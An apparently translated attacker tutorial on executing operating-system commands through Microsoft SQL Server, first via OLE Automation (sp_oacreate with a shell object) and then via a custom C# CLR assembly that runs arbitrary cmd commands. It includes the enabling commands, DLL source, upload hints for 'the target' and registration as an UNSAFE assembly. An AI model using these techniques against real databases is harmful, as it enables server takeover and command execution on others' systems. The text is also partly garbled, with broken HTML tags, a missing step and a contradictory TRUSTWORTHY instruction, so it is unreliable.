Executing commands using COM
(The Ole Automation Procedures component needs to be enabled)declare @luan <span>int</span>,@exec <span>int</span>,@text <span>int</span>,@str varchar(<span>8000 </span>);<br><span>exec</span> sp_oacreate <span>'{72C24DD5-D70A-438B-8A42-98424B88AFB8}'</span>,@luan output;<br><span>exec</span> sp_oamethod @luan,<span>'exec'</span> ,@exec output,<span>'C:\\Windows\\System32\\cmd.exe /c whoami'</span>;<br><span>exec</span> sp_oamethod @exec, <span>'StdOut'</span>, @text out;<br><span>exec</span> sp_oamethod @text, <span>'readall'</span>, @str out;<br><span>select</span> @str;<br>
If Ole Automation Procedures is not enabled, you can use the following command to enable
<span>sp_configure</span> <span>'show advanced options'</span>, <span>1</span>;<br><span>GO< /span><br>RECONFIGURE;<br><span>GO</span><br>sp_configure <span>'Ole Automation Procedures'</span>, <span>1</span>;<br><span>GO</span><br>RECONFIGURE;<br><span>GO</span><br>
Writing language: C#
VsCreate class library
<span> using</span> System;<br><span>using</span> System.Collections.Generic;<br><span>using</span> System.Linq;<br><span>using</span> System.Text;<br><span>using</span> System;<br><span>using</span> System.Threading.Tasks;<br><br><span>namespace</span> <span>shellexec</span><br>{<br> <span>public</span> <span>class</span > <span>exec</span><br> {<br> <span><span>public</span> <span>static</span> <span>string</span> <span>cmd</span>(<span><span>string</span> command</span>)<br> </span>{<br> System.Diagnostics.Process pro = <span>new</ span> System.Diagnostics.Process();<br> pro.StartInfo.FileName = <span>"cmd.exe"</span>;<br> pro.StartInfo.UseShellExecute = <span>false</span>;<br> pro.StartInfo.RedirectStandardError = <span>true</span>; <span>//Standard error</span><br> pro.StartInfo.RedirectStandardInput = <span>true</span>; <span>//Standard input</span>< br> pro.StartInfo.RedirectStandardOutput = <span>true</span>; <span>//Standard output</span><br> pro.StartInfo.CreateNoWindow = <span>true</span>; <span>/ /Whether to start the process in a new window</span><br> pro.Start();<br> pro.StandardInput.WriteLine(command + <span>"&&exit"</span>); <span> //Command parameter writing</span><br> pro.StandardInput.AutoFlush = <span>true</span>; <span>//Buffer is automatically refreshed</span><br> <span>string</span> span> output = pro.StandardOutput.ReadToEnd(); <span>//Read the execution result</span><br> pro.WaitForExit(); <span>//Wait for execution to complete and exit</span><br> pro.Close( );<br> <span>return</span> output.ToString();<br> }<br> }<br>}<br><br>
After generating the dll, you can use the hex method to write to the target, Or upload via shell. Then start constructing
1. The target database instance needs to enable clr integration
<span>exec</span> sp_configure <span>'clr enabled'</span>,1;--Enable CLR in SQL Server<br>reconfigure;<br>go<br>
2.The trusted property of the target database needs to be set to false. You can use the following statement to enable it
<span>ALTER</span> <span>DATABASE</span> [<Database name>] <span>SET</span> TRUSTWORTHY <span>ON</span><br>
3.Register DLL in the database
<span>CREATE</span> <span>ASSEMBLY</span> MySqlCLR <span>FROM</span> <span>'<dll的路径>'</span> //MySqlCLR is the variable name after importing dll<br>
4.Create a function
(construct the corresponding parameter type according to the parameter of the corresponding function type, and then remember to set RETURNS [nvarchar] (max) to return the maximum if it returns a string type), and directly name the dll in that namespace, class, and function)
<span>CREATE</span> <span>FUNCTION</span> [dbo].[cmd2] <br>( <br> @cmd <span>AS</span> <span>NVARCHAR</span>(<span>max</span>)<br>) <br><span>RETURNS</span> [<span>nvarchar</span>] (<span>max</span>) <span>WITH</span> <span>EXECUTE</span> <span>AS</span> CALLER<br><span>AS</span> <br><span>EXTERNAL</span> <span>NAME</span> [MySqlCLR].[shellexec.exec].cmd //shellexec is the namespace, exec is the class name, cmd is the function name<br><span>GO</span>
<br> access, otherwise an error will be reported during deployment
<span>ALTER</span> <span>ASSEMBLY</span> [MySqlCLR]<br><span>WITH</span> PERMISSION_SET = <span>UNSAFE</span><br>
6. Call stored procedures and function methods
select [<span>dbo</span>].[<span>cmd2</span>](<span>'whoami'</span>)<br>
Reference links:
https://blog.csdn.net/catchme_439/article/details/78411009
https://zhuanlan.zhihu.com/p/33322584?from_voters_page=true